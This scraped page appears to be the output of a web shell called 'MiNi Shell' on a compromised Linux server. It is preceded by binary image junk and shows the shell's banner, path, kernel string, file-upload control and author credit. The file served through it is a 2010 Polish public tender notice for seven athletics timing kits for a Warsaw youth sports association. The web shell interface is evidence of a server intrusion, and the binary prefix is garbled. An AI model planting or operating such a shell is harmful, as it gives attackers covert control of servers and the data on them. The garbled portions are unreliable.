JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100820/258862-N-2010.html

<p class="kh_header"><b>Warszawa: dostawa 7 zestawów do mierzenia czasu podczas zawodów lekkoatletycznych organizowanych w młodzieżowych klubach sportowych</b><br>
<b>Numer ogłoszenia: 258862 - 2010; data zamieszczenia: 20.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stowarzyszenie "Sport Dzieci i Młodzieży" , ul. Siodlarska 12, 01-464 Warszawa, woj. mazowieckie, tel. 22 666 41 00, faks 22 665 21 45.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: stowarzyszenie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa 7 zestawów do mierzenia czasu podczas zawodów lekkoatletycznych organizowanych w młodzieżowych klubach sportowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawa 7 zestawów do mierzenia czasu podczas zawodów lekkoatletycznych organizowanych w młodzieżowych klubach sportowych.
W skład 1 zestawu wchodzi: 
1)	chronometr                                 - 1 szt.
2)	elektroniczny pistolet startowy       - 1 szt.
3)	zestaw fotokomórek                     - 1 kpl.

Szczegółowy opis przedmiotu zamówienia
CHRONOMETR - 6 szt.
Chronometr jest urządzeniem do precyzyjnego pomiaru czasu w sporcie, zamontowanym w aluminiowej walizie, co umożliwia łatwe i szybkie instalowanie sprzętu oraz stanowi dobre zabezpieczenie transportowe. 
Powinien być zaprojektowany w oparciu o najnowsze osiągnięcia elektroniki światowej.
Zastosowane układy mikroprocesorowe mają zapewnić optymalne rozwią?zania funkcjonalne. Musi charakteryzować się minimalnym poborem prądu, co pozwala na wielogodzinne pracę chronometru na jednym komplecie baterii oraz następującymi parametrami technicznymi: 

Zakres mierzonego czasu		        9h 59min 59,999s
Rozdzielczość pomiaru		        1/1000s
Dokładność pomiaru			        1x10-7 (+23°C)
Stabilność temperaturowa pomiaru	        10x10-6 (-10°C ÷ +60°C)
Szybkość rejestracji wyników                   0,02s  0,1s  1s
Szybkość drukowania			        1 wynik/s
Pamięć wyników			        50 czasów
Drukarka				        papier normalny, rolka o szerokości 55 ÷ 58 mm Wejścia pomiarowe                                   4 z blokadą pomiaru i klawiszami wyzwalania ręcznego
Wyświetlacz				        LCD 10 cyfr 
Zakres temperatur pracy		        -5°C ÷ +40°C 
Interfejs                                                      szeregowy, pętla prądowa 20mA, bezpośrednie 
 sterowanie tablicą biegnącego czasu
Zasilanie				        9V DC (6xR20)					
Pobór prądu				        25mA, 300mA podczas druku
Wymiary max				        380x330x100mm
Masa max (z bateriami)		        6 kg
Obudowa				        waliza aluminiowa			

Wyposażenie standardowe
- kabel do fotokomórek
- baterie R20 6 szt 										                    - instrukcja obsługi
- karta gwarancyjna
- papier do druku

CHRONOMETR - 1 szt.

Chronometr jest wszechstronnym urządzeniem do obsługi pomiaru czasu w systemie czasu kalendarzowego i systemu punktowania w zawodach sportowych. Powinien być zaprojektowany w oparciu o najnowsze osiągnięcia elektroniki światowej. Zastosowane układy mikroprocesorowe mają zapewnić optymalne rozwią?zania funkcjonalne. Musi posiadać wewnętrzne oprogramowanie dostosowane do większości rodzajów konkurencji sportowych. Dodatkowo powinien zawierać algorytmy do obsługi biegów indywidualnych (indywidualny start) i biegów masowych (wspólny start). 
Chronometr powinien być samodzielnym urządzeniem umieszczonym w aluminiowej walizce, która powinna stanowić jednocześnie jego obudowę. Wewnątrz walizki musi znajdować się akumulator żelowy pozwalający na wielogodzinne pomiary z własnego źródła zasilania.
Musi charakteryzować się następującymi parametrami technicznymi: 

Liczba torów pomiaru czasu:	            3 wejścia typu NO lub NC
Rozdzielczość:			0,001s
dokładność pomiaru: 		            1x10-7 (23oC)
Stabilność temperaturowa pomiaru:	5x10-6 (-10°C ÷ +60°C)
wymiary: 			            450 x 310 x 105mm
waga max:			            7 kg
wbudowany akumulator
interfejsy: 			            RS232, RS485, pętla prądowa 20mA
wyświetlacze LCD:                           2 x 8 cyfr, 4 x 16 znaków alfanumerycznych 
                                                          (z podświetleniem)
wbudowana klawiatura numeryczna z funkcją wprowadzania alfabetu
wbudowana drukarka na papier termiczny 112 mm

Wyposażenie standardowe: 
- zasilacz do ładowania chronometru 
- oprogramowanie do obsługi pomiaru czasu na zawodach sportowych
- przycisk sędziowski
- instrukcja obsługi
- karta gwarancyjna
- papier do druku
ELEKTRONICZNY  PISTOLET  STARTOWY - 7 szt.

Elektroniczny pistolet startowy jest urządzeniem przeznaczonym do symulowania sygnału startu w różnych dyscyplinach sportu. Musi umożliwiać również emitowanie sygnału falstartu. 
Poprzez wbudowane głośniki musi emitować co najmniej trzy różne rodzaje dźwięku o dużym natężeniu Użytkownik powinien mieć możliwość wyboru między odgłosem strzału z pistoletu, a dwoma rodzajami gongu lub syreny. Jednocześnie z sygnałem dźwiękowym urządzenie musi generować impuls uruchamiający aparaturę do pomiaru czasu.
Wbudowany akumulator powinien pozwalać na wykonanie ok. 1000 strzałów po uprzednim pełnym naładowaniu. 
Urządzenie powinno być umieszczone w estetycznej walizie aluminiowej stanowiącej jednocześnie jego obudowę.

Dane techniczne:
Rodzaj dźwięku 		                   strzał, syrena, gong
Moc dźwięku			                   600W (sin)
Głośniki wewnętrzne		                   2szt, 300W
Zasilanie wewnętrzne		                   akumulator 12V  6,5Ah
Zasilanie zewnętrzne		                   12V DC
Wymiary zewnętrzne	max.	                   340x340x180mm
Waga max.			                   9 kg
Ładowanie			                   10h za pomocą zasilacza sieciowego
Opóźnienie impulsu do pomiaru czasu     < 1ms 
Obudowa	aluminiowa, odporna na warunki atmosferyczne,    bryzgoszczelna
Sygnalizacja gotowości do startu	       dioda LED
Sygnalizacja stanu akumulatora	       dioda LED
Wyjście do chronometru		       NO
Wyjście na głośnik zewnętrzny
Wyjście na wzmacniacz zewnętrzny
Wyposażenie standardowe:
- przycisk do wyzwalania dźwięku (na kablu o dł. 3 m)
- ładowarka sieciowa
- kabel do podłączenia zasilania zewnętrznego
- kabel linii startowej na bębnie 200 m
- instrukcja obsługi
- karta gwarancyjna
ZESTAW FOTOKOMÓREK - 7 kpl.

Zestaw fotokomórek powinien składać się z nadajnika promieniowania podczerwonego i odbiornika. Zestaw powinien opierać się na najnowszych rozwiązaniach konstrukcyjnych w dziedzinie elektroniki i optyki. Nadajnik i odbiornik powinny być wykonane techniką montażu powierzchniowego, co gwa?rantuje praktycznie stuprocen?tową niezawodność i charakteryzować się minimalnym poborem prądu oraz rozbudowaną sygnalizacją poprawnej pracy. Lampka sygnalizacyjna w nadajniku powinna być umieszczona w świetle soczewki, co będzie pozwalało na stałą kontrolę poprawności pracy podczas trwania  zawodów. Oba człony zestawu powinny być zamknięte w hermetycznej obudowie, co będzie pozwalało na pracę w każdych warunkach atmosferycznych. Wymagane jest, aby w urządzeniu zastosowano rozwiązania inteligentnej analizy warunków pracy, co pozwoli na uzyskanie  bardzo dużej dynamiki zasięgu działania zestawu i automa?tyczne dostosowywanie się do warunków zewnętrznych. Nadajnik i odbiornik muszą charakteryzować się niżej opisanymi parametrami technicznymi:

Nadajnik 
Napięcie zasilania		6V DC (3,0V ÷ 6,5V)
Pobór prądu			70mA
Częstotliwość modulacji	204,8kHz (opcjonalnie 153,6kHz)
Zakres temperatur pracy	-20°C ÷ +50°C
Wymiary max.		O54x183mm
Masa max.			360g

Odbiornik 
Napięcie zasilania		6V DC (4,7V ÷ 14V)
Pobór prądu			10/40mA
Opóźnienie zwarcia		< 1ms
Zakres temperatur pracy	-20°C ÷ +50°C
Wymiary max.		o54x212mm
Masa	max.			440g

Zestaw nadajnik-odbiornik
Zasięg gwarantowany		> 100m

Wyposażenie standardowe: 
walizka transportowa 			            1szt.
statyw do fotokomórki		            2szt.
kabel zasilający nadajnika (1,5 m)	            1szt.
kabel zasilający odbiornika (1,5 m)	            1szt.
akumulator 6V				2szt.
zasilacz do ładowania akumulatorów	2szt.
instrukcja obsługi			            1szt.
karta gwarancyjna			            1szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.70.00.00-2, 38.72.00.00-8, 30.23.21.10-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 2.000,00 zł (słownie dwa tysiące 00/100 zł).
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu, 
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r., Nr 42, poz. 275 z późn. zm.). 
3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego nr: 24 1500 1012 1210 1007 9441 0000, a dokument potwierdzający wpłatę (pokwitowanie) należy złożyć w siedzibie Zamawiającego w Stowarzyszeniu Sport Dzieci i Młodzieży w Warszawie przy ul. Siodlarskiej 12. 
 Za skuteczne wniesienie wadium w pieniądzu Zamawiający uzna wadium, które znajdzie się            
 na rachunku bankowym przed upływem terminu składania ofert.
  Dowodem wniesienia wadium może być dokument potwierdzający dokonanie przelewu      kwoty wadium lub jego kopia potwierdzona przez Wykonawcę, które należy dołączyć do oferty.
4.	W przypadku wniesienia wadium w formie innej niż pieniężna, Zamawiający wymaga złożenia wraz z ofertą oryginału dokumentu wadialnego (gwarancji lub poręczenia).
5.	Dokument wadialny, o którym mowa w ust. 4, powinien zawierać informacje o udzieleniu gwarancji lub poręczenia na kwotę wymienioną w ust. 1, stanowiących zabezpieczenie wadium na rzecz Zamawiającego w przetargu nieograniczonym na dostawę 7 zestawów do mierzenia czasu podczas zawodów lekkoatletycznych organizowanych w młodzieżowych klubach sportowych, ważnych przez okres związania ofertą, określony w niniejszej SIWZ, oraz zobowiązanie gwaranta/poręczyciela do wypłaty kwoty wadium na pierwsze żądanie Zamawiającego w przypadkach określonych w art. 46 ust. 4a oraz ust. 5 ustawy.
6.	Dokument wadialny, o którym mowa w ust. 4, należy złożyć w oddzielnym, zamkniętym opakowaniu (kopercie) przed upływem terminu składania ofert, w miejscu wskazanym w Rozdziale XI. Opakowanie (kopertę) zawierającą dokument wadialny należy opisać analogicznie do opisu oferty wskazanego w Rozdziale X, z dopiskiem: wadium. Kserokopię niniejszego dokumentu należy dołączyć do oferty.
7.	Termin wniesienia wadium upływa wraz z upływem terminu składania ofert.
8.	Wadium musi zabezpieczać ofertę przez cały okres związania ofertą, począwszy od dnia, w którym upływa termin składania ofert.
9.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 10 oraz art. 46 ust. 4a ustawy.
10.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz po wniesieniu zabezpieczenia należytego wykonania umowy, z zastrzeżeniem art. 46 ust. 5 ustawy.
11.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
12.	Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
13.	Okoliczności zatrzymania wadium oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa.
14.	Zasady wnoszenia wadium określone w niniejszym Rozdziale dotyczą również przedłużania ważności wadium oraz wnoszenia nowego wadium w przypadkach określonych w ustawie.
15.	Zamawiający wykluczy z postępowania na podstawie art. 24 ust. 2 pkt 2 ustawy Wykonawców, którzy nie wniosą wadium w określonym terminie i prawidłowej formie, lub złożą wadliwe wadium, w tym również na przedłużony okres związania ofertą, lub w sytuacji, o której mowa w art. 46 ust. 3 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających ten warunek zostaną uznani Wykonawcy, którzy w okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres działalności jest krótszy - w tym okresie, wykonali należycie dostawy w zakresie zgodnym z przedmiotem zamówienia (co najmniej 2 dostawy o wartości nie mniejszej jak 40.000,00 PLN brutto każda).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających ten warunek udziału w postępowaniu zostaną uznani Wykonawcy, którzy posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 100.000,00 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czwartki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Stowarzyszenie Sport Dzieci i Młodzieży
ul. Siodlarska 12, 01-464 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2010 godzina 16:00, miejsce: Stowarzyszenie Sport Dzieci i Młodzieży
ul. Siodlarska 12, 01-464 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com